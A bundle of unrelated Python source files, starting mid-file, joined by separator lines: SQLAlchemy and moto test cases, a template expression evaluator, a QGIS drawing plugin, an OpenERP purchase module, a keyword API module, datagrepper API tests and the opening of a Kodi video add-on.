dialect=mysql.dialect()
)
def test_startswith_text_mysql(self):
self.assert_compile(
column('x').startswith(text('y')),
"x LIKE concat(y, '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_endswith(self):
self.assert_compile(
column('x').endswith('y'),
"x LIKE '%%' || :x_1",
checkparams={'x_1': 'y'}
)
def test_endswith_escape(self):
self.assert_compile(
column('x').endswith('y', escape='\\'),
"x LIKE '%%' || :x_1 ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_not_endswith(self):
self.assert_compile(
~column('x').endswith('y'),
"x NOT LIKE '%%' || :x_1",
checkparams={'x_1': 'y'}
)
def test_not_endswith_escape(self):
self.assert_compile(
~column('x').endswith('y', escape='\\'),
"x NOT LIKE '%%' || :x_1 ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_endswith_literal(self):
self.assert_compile(
column('x').endswith(literal_column('y')),
"x LIKE '%%' || y",
checkparams={}
)
def test_endswith_text(self):
self.assert_compile(
column('x').endswith(text('y')),
"x LIKE '%%' || y",
checkparams={}
)
def test_endswith_mysql(self):
self.assert_compile(
column('x').endswith('y'),
"x LIKE concat('%%', %s)",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_endswith_mysql(self):
self.assert_compile(
~column('x').endswith('y'),
"x NOT LIKE concat('%%', %s)",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_endswith_literal_mysql(self):
self.assert_compile(
column('x').endswith(literal_column('y')),
"x LIKE concat('%%', y)",
checkparams={},
dialect=mysql.dialect()
)
def test_endswith_text_mysql(self):
self.assert_compile(
column('x').endswith(text('y')),
"x LIKE concat('%%', y)",
checkparams={},
dialect=mysql.dialect()
)
class CustomOpTest(fixtures.TestBase):
def test_is_comparison(self):
c = column('x')
c2 = column('y')
op1 = c.op('$', is_comparison=True)(c2).operator
op2 = c.op('$', is_comparison=False)(c2).operator
assert operators.is_comparison(op1)
assert not operators.is_comparison(op2)
class TupleTypingTest(fixtures.TestBase):
def _assert_types(self, expr):
eq_(expr.clauses[0].type._type_affinity, Integer)
eq_(expr.clauses[1].type._type_affinity, String)
eq_(expr.clauses[2].type._type_affinity, LargeBinary()._type_affinity)
def test_type_coersion_on_eq(self):
a, b, c = column(
'a', Integer), column(
'b', String), column(
'c', LargeBinary)
t1 = tuple_(a, b, c)
expr = t1 == (3, 'hi', 'there')
self._assert_types(expr.right)
def test_type_coersion_on_in(self):
a, b, c = column(
'a', Integer), column(
'b', String), column(
'c', LargeBinary)
t1 = tuple_(a, b, c)
expr = t1.in_([(3, 'hi', 'there'), (4, 'Q', 'P')])
eq_(len(expr.right.clauses), 2)
for elem in expr.right.clauses:
self._assert_types(elem)
class AnyAllTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def _fixture(self):
m = MetaData()
t = Table(
'tab1', m,
Column('arrval', Array(Integer)),
Column('data', Integer)
)
return t
def test_any_array(self):
t = self._fixture()
self.assert_compile(
5 == any_(t.c.arrval),
":param_1 = ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_array(self):
t = self._fixture()
self.assert_compile(
5 == all_(t.c.arrval),
":param_1 = ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_comparator_array(self):
t = self._fixture()
self.assert_compile(
5 > any_(t.c.arrval),
":param_1 > ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_comparator_array(self):
t = self._fixture()
self.assert_compile(
5 > all_(t.c.arrval),
":param_1 > ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_comparator_array_wexpr(self):
t = self._fixture()
self.assert_compile(
t.c.data > any_(t.c.arrval),
"tab1.data > ANY (tab1.arrval)",
checkparams={}
)
def test_all_comparator_array_wexpr(self):
t = self._fixture()
self.assert_compile(
t.c.data > all_(t.c.arrval),
"tab1.data > ALL (tab1.arrval)",
checkparams={}
)
def test_illegal_ops(self):
t = self._fixture()
assert_raises_message(
exc.ArgumentError,
"Only comparison operators may be used with ANY/ALL",
lambda: 5 + all_(t.c.arrval)
)
# TODO:
# this is invalid but doesn't raise an error,
# as the left-hand side just does its thing. Types
# would need to reject their right-hand side.
self.assert_compile(
t.c.data + all_(t.c.arrval),
"tab1.data + ALL (tab1.arrval)"
)
def test_any_array_comparator_accessor(self):
t = self._fixture()
self.assert_compile(
t.c.arrval.any(5, operator.gt),
":param_1 > ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_array_comparator_accessor(self):
t = self._fixture()
self.assert_compile(
t.c.arrval.all(5, operator.gt),
":param_1 > ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_array_expression(self):
t = self._fixture()
self.assert_compile(
5 == any_(t.c.arrval[5:6] + postgresql.array([3, 4])),
"%(param_1)s = ANY (tab1.arrval[%(arrval_1)s:%(arrval_2)s] || "
"ARRAY[%(param_2)s, %(param_3)s])",
checkparams={
'arrval_2': 6, 'param_1': 5, 'param_3': 4,
'arrval_1': 5, 'param_2': 3},
dialect='postgresql'
)
def test_all_array_expression(self):
t = self._fixture()
self.assert_compile(
5 == all_(t.c.arrval[5:6] + postgresql.array([3, 4])),
"%(param_1)s = ALL (tab1.arrval[%(arrval_1)s:%(arrval_2)s] || "
"ARRAY[%(param_2)s, %(param_3)s])",
checkparams={
'arrval_2': 6, 'param_1': 5, 'param_3': 4,
'arrval_1': 5, 'param_2': 3},
dialect='postgresql'
)
def test_any_subq(self):
t = self._fixture()
self.assert_compile(
5 == any_(select([t.c.data]).where(t.c.data < 10)),
":param_1 = ANY (SELECT tab1.data "
"FROM tab1 WHERE tab1.data < :data_1)",
checkparams={'data_1': 10, 'param_1': 5}
)
def test_all_subq(self):
t = self._fixture()
self.assert_compile(
5 == all_(select([t.c.data]).where(t.c.data < 10)),
":param_1 = ALL (SELECT tab1.data "
"FROM tab1 WHERE tab1.data < :data_1)",
checkparams={'data_1': 10, 'param_1': 5}
)
|
from __future__ import unicode_literals
import boto
from boto.ec2.autoscale.launchconfig import LaunchConfiguration
from boto.ec2.autoscale.group import AutoScalingGroup
from boto.ec2.autoscale.policy import ScalingPolicy
import sure # noqa
from moto import mock_autoscaling
def setup_autoscale_group():
conn = boto.connect_autoscale()
config = LaunchConfiguration(
name='tester',
image_id='ami-abcd1234',
instance_type='m1.small',
)
conn.create_launch_configuration(config)
group = AutoScalingGroup(
name='tester_group',
max_size=2,
min_size=2,
launch_config=config,
)
conn.create_auto_scaling_group(group)
return group
@mock_autoscaling
def test_create_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
cooldown=60,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.name.should.equal('ScaleUp')
policy.adjustment_type.should.equal('ExactCapacity')
policy.as_name.should.equal('tester_group')
policy.scaling_adjustment.should.equal(3)
policy.cooldown.should.equal(60)
@mock_autoscaling
def test_create_policy_default_values():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.name.should.equal('ScaleUp')
# Defaults
policy.cooldown.should.equal(300)
@mock_autoscaling
def test_update_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.scaling_adjustment.should.equal(3)
# Now update it by creating another with the same name
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=2,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.scaling_adjustment.should.equal(2)
@mock_autoscaling
def test_delete_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.get_all_policies().should.have.length_of(1)
conn.delete_policy('ScaleUp')
conn.get_all_policies().should.have.length_of(0)
@mock_autoscaling
def test_execute_policy_exact_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
@mock_autoscaling
def test_execute_policy_positive_change_in_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ChangeInCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(5)
@mock_autoscaling
def test_execute_policy_percent_change_in_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='PercentChangeInCapacity',
as_name='tester_group',
scaling_adjustment=50,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
@mock_autoscaling
def test_execute_policy_small_percent_change_in_capacity():
""" http://docs.aws.amazon.com/AutoScaling/latest/DeveloperGuide/as-scale-based-on-demand.html
If PercentChangeInCapacity returns a value between 0 and 1,
Auto Scaling will round it off to 1."""
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='PercentChangeInCapacity',
as_name='tester_group',
scaling_adjustment=1,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
|
#!/usr/bin/env python3
"""
Python script to evaluate and insert python expression in files
"""
import argparse
import importlib
import re
import sys
import traceback as tb
from pathlib import Path
from types import ModuleType
from typing import Any, Dict, Generator, List, NoReturn, TextIO, Tuple, Union
if sys.version_info < (3, 8):
raise RuntimeError("This script requires python 3.8 or higher")
is_whitespace = re.compile(r"^\s*$").match
class HandledException(Exception):
"""
Exception that was already printed
"""
def process_template(
in_file: TextIO,
start_delimiter: str,
end_delimiter: str,
globalns: Dict[str, Any],
localns: Dict[str, Any],
) -> Generator[str, None, None]:
"""
Read lines from a file and evaluates occurences of occurence_re
"""
lineno = 0
for line in in_file:
lineno += 1
start, end = 0, 0
indent = ""
while (start := line.find(start_delimiter, end)) >= 0:
if end == 0 and is_whitespace(line[:start]):
indent = line[:start]
yield line[end:start]
start += len(start_delimiter)
expr = ""
offset = 0
while (end := line.find(end_delimiter, start)) < 0:
expr += line[start:]
line = next(in_file)
offset += 1
start = 0
expr += line[start:end]
try:
value = eval(expr, globalns, localns)
except Exception as err:
print(
f"Expression at line {lineno}{'-' + str(lineno + offset) if offset else ''} raised an exception"
)
print("Offending expression:", start_delimiter + expr + end_delimiter)
print(
"Exception raised:\n\n",
"".join(tb.format_exception(type(err), err, err.__traceback__)),
)
raise HandledException from err
if not isinstance(value, str):
print(
f"Expression at line {lineno}{'-' + str(lineno + offset) if offset else ''} does not evaluate to a string"
)
print(f"Offending expression:", start_delimiter + expr + end_delimiter)
raise HandledException from ValueError(
f"{start_delimiter + expr + end_delimiter} does not evaluate to a string"
)
if indent:
value = value.replace("\n", "\n" + indent)
yield value
end += len(end_delimiter)
lineno += offset
offset = 0
yield line[end:]
def main(
input: Path,
output: Path,
delimiters: Union[Tuple[str], Tuple[str, str]],
global_namespaces: List[str] = (),
local_namespaces: List[str] = (),
) -> NoReturn:
"""
Main script entry point
"""
# build delimiter regex
start_delimiter = delimiters[0]
end_delimiter = delimiters[0] if len(delimiters) == 1 else delimiters[1]
# load namespaces
globalns, localns = {}, {}
for ns, source_list in zip(
(globalns, localns),
(global_namespaces, local_namespaces),
):
for name in source_list:
try:
try:
# assume we are loading a module
module = importlib.import_module(name)
ns.update(vars(module))
except ImportError:
# assume last element in name is an attribute
module_name, attr_name = name.rsplit(".", maxsplit=1)
module = importlib.import_module(module_name)
ns.update(getattr(module, attr_name))
except Exception as err:
print(
"error: Could not load {name} due to:",
"".join(tb.format_exception(type(err), err, err.__traceback__)),
sep="\n\n",
)
exit(-1)
# process and write lines
with input.open() as in_file:
try:
with output.open("wt") as out_file:
out_file.writelines(
process_template(
in_file,
start_delimiter,
end_delimiter,
globalns,
localns,
)
)
except HandledException:
print("An error occured, see above")
print("Deleting output file ...")
output.unlink(missing_ok=True)
except Exception as err:
print("An unhandled error occured, see below")
print("Deleting output file ...")
output.unlink(missing_ok=True)
raise err
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="""
Evaluate python expressions in files and replace them by their value.
This script will find expression in-between delimiters in a file, evaluate them
and replace the expressions by their value in the output file. The namespace in
which the expression are evaluated can be populated.
If the resulting value contains newlines, and there was indentation before the
start delimiter, the indentation is preserved before each newline. This allows
for prettier formatting of the output.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"input",
type=Path,
help="File to read from and evaluate expressions in",
)
parser.add_argument(
"output",
type=Path,
help="File to write the content of the input with evaluated expressions",
)
delimiter_group = parser.add_argument_group(title="delimiter arguments")
delimiter_group.add_argument(
"-d",
"--delimiters",
default=["$$"],
nargs="+",
help=(
"Delimiters that marks the start and end of an expression."
" If only one is provided, it is used as both the start and end delimiter."
" If two are used, the first is the start delimiter, the second is the end delimiter."
),
)
namespace_group = parser.add_argument_group(title="namespace arguments")
namespace_group.add_argument(
"-g",
"--global-namespaces",
type=str,
nargs="*",
default=[],
help=(
"Namespaces to load into the global namespace."
" The packages and modules are loaded from left to right and can overwrite previous values."
" The syntax is the same than the python 'import' statement, but you can end the dotted chain by an attribute of a module."
),
)
namespace_group.add_argument(
"-l",
"--local-namespaces",
type=str,
nargs="*",
default=[],
help=(
"Namespaces to load into the local namespace."
" The packages and modules are loaded from left to right and can overwrite previous values."
" The syntax is the same than the python 'import' statement, but you can end the dotted chain by an attribute of a module."
" The local namespace can be edited by expressions with side-effects, such as the walrus operator ':='."
),
)
args = parser.parse_args()
# check arguments
if not args.input.is_file():
parser.error(f"{args.input!s} doesn't exists or is not a file")
if not isinstance(args.delimiters, list):
args.delimiters = [args.delimiters]
if not 0 < len(args.delimiters) < 3:
parser.error("there must be one or two delimiters")
main(**vars(args))
|
"""
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Drawing Tool - Quantum GIS python plugin for a user-selected rectangle
Author: Wan Wei
Date: 2015-11-06
Version: 0.1.0
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.uic import *
from qgis.core import *
from qgis.gui import *
from ui_WidgetDrawingTool import Ui_WidgetDrawingTool
class DrawingToolDlg(QDialog, Ui_WidgetDrawingTool):
def __init__(self, iface):
super(DrawingToolDlg, self).__init__(iface.mainWindow)
self.setupUi(self)
self.iface = iface
self.canvas = self.iface.mapCanvas
self.rectangle = QgsRectangle(0.0,0.0,0.0,0.0)
self.numCorners = 0
self.hasRectangle = False
self.isEmittingPoint = False # indicates whether rubber band points are being captured
# Set up the rubber band parameters
self.lineColor = QColor(255,0,0)
self.lineWidth = 2
# Init rubberBand
self.emitPoint = QgsMapToolEmitPoint(self.canvas)
QObject.connect(self.emitPoint,
SIGNAL("canvasClicked(const QgsPoint &, Qt::MouseButton)"),
self.drawingRectangle)
#self.label = QLabel(self)
#self.label.setGeometry(QRect(10, 120, 181, 31))
def drawingRectangle(self, point, button):
if self.hasRectangle: # just adjusting corners
self.adjustRectangle(point)
elif self.numCorners == 0: # no points yet - set first point
self.numCorners = 1
self.xStart = point.x()
self.yStart = point.y()
else: # have one corner, adding second one
# create the rubber band to be used to display the clip area and set up it's initial limits
self.rubberBand=QgsRubberBand(self.canvas)
self.rubberBand.setColor(self.lineColor)
self.rubberBand.setWidth(self.lineWidth)
self.rectangle.setXMinimum(min(self.xStart,point.x()))
self.rectangle.setYMinimum(min(self.yStart,point.y()))
self.rectangle.setXMaximum(max(self.xStart,point.x()))
self.rectangle.setYMaximum(max(self.yStart,point.y()))
self.numCorners = 2
self.adjustRectangle(point)
self.hasRectangle = True
self.updateCoordinates()
def adjustRectangle(self, point):
"""
Adjusts the clip rectangle according to the input point and redraws the rubber band
"""
if self.hasRectangle:
self.rubberBand.reset()
if abs(self.rectangle.xMinimum() - point.x()) < abs(self.rectangle.xMaximum() - point.x()):
# closest to the left - move that
self.rectangle.setXMinimum(point.x())
else:
# closest to the right - move that
self.rectangle.setXMaximum(point.x())
if abs(self.rectangle.yMinimum() - point.y()) < abs(self.rectangle.yMaximum() - point.y()):
# closest to the bottom - move that
self.rectangle.setYMinimum(point.y())
else:
# closest to the top - move that
self.rectangle.setYMaximum(point.y())
# draw the new clip rectangle
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMaximum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMinimum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMinimum(), self.rectangle.yMinimum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMinimum(), self.rectangle.yMaximum()))
self.rubberBand.addPoint(QgsPoint(self.rectangle.xMaximum(), self.rectangle.yMaximum()))
def setDrawingTool(self):
if not self.isEmittingPoint and \
self.canvas.mapTool() != self.emitPoint:
self.canvas.setMapTool(self.emitPoint)
self.isEmittingPoint = True
def resetDrawingTool(self):
if self.isEmittingPoint and \
self.canvas.mapTool() == self.emitPoint:
self.canvas.unsetMapTool(self.emitPoint)
self.isEmittingPoint = False
if self.hasRectangle:
self.rubberBand.reset()
self.rubberBand.removeLastPoint()
self.canvas.refresh()
self.rubberBand = ''
self.hasRectangle = False
self.numCorners == 0
self.rectangle = QgsRectangle(0.0,0.0,0.0,0.0)
self.labelButtomRight.setText(' ')
self.labelUpLeft.setText(' ')
def updateCoordinates(self):
self.labelButtomRight.setText('X ' + str(self.rectangle.xMaximum()) + ' ' + \
'Y ' + str(self.rectangle.yMinimum()))
self.labelUpLeft.setText('X ' + str(self.rectangle.xMinimum()) + ' ' + \
'Y ' + str(self.rectangle.yMaximum()))
"""
def getDrawingBounds(self):
self.label.setText(str(self.rectangle.xMinimum()) + ' ' + \
str(self.rectangle.yMaximum()) + ' ' + \
str(self.rectangle.xMaximum()) + ' ' + \
str(self.rectangle.yMinimum()))
"""
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: moylop260 ([email protected])
# Isaac Lopez ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import openerp.netsvc as netsvc
from openerp.osv import osv, fields
from mx import DateTime
from tools import config
from openerp.tools.translate import _
class purchase_order(osv.Model):
_inherit = "purchase.order"
def wkf_confirm_order(self, cr, uid, ids, context=None):
product_supp_obj = self.pool.get('product.supplierinfo')
company_id = self.pool.get(
'res.users').browse(cr, uid, uid).company_id.id
product_obj = self.pool.get('product.template')
if super(purchase_order, self).wkf_confirm_order(cr, uid, ids,
context=context):
for po in self.browse(cr, uid, ids, context=context):
partner_id = po.partner_id.id
for line in po.order_line:
product_id = line.product_id.product_tmpl_id.id
if not product_supp_obj.search(cr, uid,
[('product_id', '=',
product_id),
('name', '=', partner_id)]):
product_obj.write(cr, uid, [product_id],
{
'seller_ids': [(0, 0,
{'name': partner_id,
'min_qty': 1.0,
'delay': 1,
'sequence': 10,
'product_id':
product_id,
'company_id':
company_id,
'product_uom':
line and
line.product_id and
line.product_id.
uom_id and
line.product_id.
uom_id.id})]})
return True
else:
return False
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
"""
This module handles list of Aleph's keywords, provides REST API with this
keywords and allows translation of those keywords to their codes and so on.
This module cointains four major variables:
- KW_DICT (dict): ``keyword: {info}`` mapping.
- KEYWORDS (list): List of keywords.
- KEYWORDS_LOWER (list): List of keywords.lower()
- KW_CACHE_PATH (str): Path to the keyword file in ``/tmp`` (bottle
optimization).
"""
#
# Imports =====================================================================
import bz2
import json
import os.path
from os.path import join
from collections import OrderedDict
from bottle import get
from bottle import response
from ..settings import API_PATH
from shared import gzip_cache
from shared import JSON_MIME
from shared import to_gzipped_file
# Loaders =====================================================================
def read_kw_file():
"""
Read content of the file containing keyword informations in JSON. File is
packed using BZIP.
Returns:
list: List of dictionaries containing keywords.
"""
self_path = os.path.dirname(__file__)
kw_list_path = join(self_path, "../templates/keyword_list.json.bz2")
with bz2.BZ2File(kw_list_path) as f:
kw_list = f.read()
return json.loads(kw_list)
def build_kw_dict(kw_list):
"""
Build keyword dictionary from raw keyword data. Ignore invalid or
invalidated records.
Args:
kw_list (list): List of dicts from :func:`read_kw_file`.
Returns:
OrderedDict: dictionary with keyword data.
"""
kw_dict = OrderedDict()
sorted_list = sorted(
kw_list,
key=lambda x: x.get("zahlavi").encode("utf-8")
)
for keyword_data in sorted_list:
if "zahlavi" not in keyword_data:
continue
zahlavi = keyword_data["zahlavi"].encode("utf-8")
old_record = kw_dict.get(zahlavi)
if not old_record:
kw_dict[zahlavi] = keyword_data
continue
key = "angl_ekvivalent"
if not old_record.get(key) and keyword_data.get(key):
kw_dict[zahlavi] = keyword_data
continue
key = "zdroj_angl_ekvivalentu"
if not old_record.get(key) and keyword_data.get(key):
kw_dict[zahlavi] = keyword_data
continue
if len(str(keyword_data)) > len(str(old_record)):
kw_dict[zahlavi] = keyword_data
continue
return kw_dict
# Variables ===================================================================
_INITIALIZED = False
KW_DICT = None # Output from :func:`build_kw_dict`.
KEYWORDS = None # List of strings with keywords.
KEYWORDS_LOWER = None # List of strings with keywords.lower()
#: Path to the unpacked keyword list in /tmp. This is used as bottle
#: optimization.
KW_CACHE_PATH = None
def init():
"""
Initialize all global variables (:attr:`.KW_DICT`, :attr:`.KEYWORDS`,
:attr:`.KEYWORDS_LOWER`, :attr:`.KW_CACHE_PATH`) to their values.
Global variables are then used from analyzers and so on.
"""
global _INITIALIZED
if _INITIALIZED:
return
global KW_DICT
global KEYWORDS
global KW_CACHE_PATH
global KEYWORDS_LOWER
KW_DICT = build_kw_dict(read_kw_file())
KEYWORDS = sorted([k.decode("utf-8") for k in KW_DICT.keys()])
KEYWORDS_LOWER = {
k.lower(): k
for k in KEYWORDS
}
keywords_json = json.dumps(KEYWORDS)
KW_CACHE_PATH = "/tmp/wa_kat_cache_keywords.json"
# create cached files
with open(KW_CACHE_PATH, "w") as f:
f.write(keywords_json)
with open(KW_CACHE_PATH + ".gz", "w") as f:
to_gzipped_file(keywords_json, out=f)
_INITIALIZED = True
init()
# Functions ===================================================================
def keyword_to_info(keyword):
"""
Get keyword dict based on the `keyword`.
Args:
keyword (str): Keyword as string.
Returns:
dict: Additional keyword info.
"""
return KW_DICT.get(keyword)
# API =========================================================================
@get(join(API_PATH, "kw_list.json"))
def get_kw_list():
"""
Virtual ``kw_list.json`` file.
List of all keywords on one JSON page. This is later used by the typeahead
script, which shows keyword hints to user.
"""
response.content_type = JSON_MIME
return gzip_cache(KW_CACHE_PATH)
|
# SPDX-License-Identifier: GPL-2.0+
# Copyright 2018 Mike Bonnet <[email protected]>
import json
import os
import unittest
from datetime import datetime, timedelta
from unittest.mock import MagicMock, patch
with patch.dict(os.environ, DATAGREPPER_CONFIG="/dev/null"):
import datagrepper.app
class TestAPI(unittest.TestCase):
def setUp(self):
datagrepper.app.app.testing = True
self.client = datagrepper.app.app.test_client()
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_defaults(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
self.assertEqual(grep.call_args[0], ())
kws = grep.call_args[1]
self.assertIsNone(kws["start"])
self.assertIsNone(kws["end"])
self.assertEqual(kws["page"], 1)
self.assertEqual(kws["rows_per_page"], 25)
self.assertEqual(kws["order"], "desc")
for arg in [
"users",
"packages",
"categories",
"topics",
"contains",
"not_users",
"not_packages",
"not_categories",
"not_topics",
]:
self.assertEqual(kws[arg], [])
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_default_result(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
result = json.loads(resp.get_data())
self.assertEqual(result["count"], 0)
self.assertEqual(result["pages"], 0)
self.assertEqual(result["total"], 0)
self.assertEqual(result["raw_messages"], [])
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_delta(self, grep):
# At one point, this would produce a traceback/500.
resp = self.client.get("/raw?delta=14400&category=wat&contains=foo")
self.assertEqual(resp.status_code, 200)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_delta_and_start(self, grep):
resp = self.client.get("/raw?start=1564503781&delta=600")
self.assertEqual(resp.status_code, 200)
self.assertEqual(grep.call_args[0], ())
kws = grep.call_args[1]
expected_start = datetime.fromtimestamp(1564503781)
self.assertEqual(kws["start"], expected_start)
expected_end = expected_start + timedelta(seconds=600)
self.assertEqual(kws["end"], expected_end)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta(self, grep):
resp = self.client.get("/raw")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was applied
self.assertEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_start(self, grep):
resp = self.client.get("/raw?start=1564503781")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertNotEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_delta(self, grep):
resp = self.client.get("/raw?delta=7200")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertEqual((kws["end"] - kws["start"]).total_seconds(), 7200.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
@patch.dict(datagrepper.app.app.config, {"DEFAULT_QUERY_DELTA": 180})
def test_raw_default_query_delta_with_end(self, grep):
resp = self.client.get("/raw?end=1564503781")
self.assertEqual(resp.status_code, 200)
kws = grep.call_args[1]
# Verify the default query delta was not applied
self.assertNotEqual((kws["end"] - kws["start"]).total_seconds(), 180.0)
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_raw_contains_without_delta(self, grep):
"""https://github.com/fedora-infra/datagrepper/issues/206"""
resp = self.client.get("/raw?category=wat&contains=foo")
self.assertEqual(resp.status_code, 400)
target = b"When using contains, specify a start at most eight months"
assert target in resp.data, "%r not in %r" % (target, resp.data)
@patch("datagrepper.app.dm.Message.query", autospec=True)
def test_id(self, query):
msg = query.filter_by.return_value.first.return_value
msg.__json__ = MagicMock(return_value={"key": "value"})
resp = self.client.get("/id?id=one")
self.assertEqual(resp.status_code, 200)
self.assertEqual(query.filter_by.call_args, ((), {"msg_id": "one"}))
@patch("datagrepper.app.count_all_messages", autospec=True, return_value=42)
def test_count(self, count_all_messages):
resp = self.client.get("/messagecount")
self.assertEqual(resp.status_code, 200)
result = json.loads(resp.get_data())
self.assertEqual(result, {"messagecount": 42})
@patch("datagrepper.app.dm.Message.grep", return_value=(0, 0, []))
def test_chart_line(self, grep):
resp = self.client.get("/charts/line")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.mimetype, "image/svg+xml")
self.assertIn(
b'<svg xmlns:xlink="http://www.w3.org/1999/xlink', resp.get_data()
)
|
import sys
import json
import urllib, urllib2
import xbmc
import xbmcgui
import XbmcHelpers
common = XbmcHelpers
from videohosts import tools
URL = "https://ahoy.yohoho.online/"
HEADERS = {
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "https://yohoho.cc",
"Referer": "https://yohoho.cc/",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
HEADERS2 = {
"Host": "hdgo.cx",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
}
VALUES = {
"kinopoisk": "{0}",
"tv": "1",
"resize": "1",
"player": "videocdn,collaps,iframe,hdvb,kodik",
"button": "videocdn: {Q} {T}, hdvb: {Q} {T}, kodik: {Q} {T}, iframe: {Q} {T}",
"button_limit": "8",
"button_size": "1",
"separator": ","
}
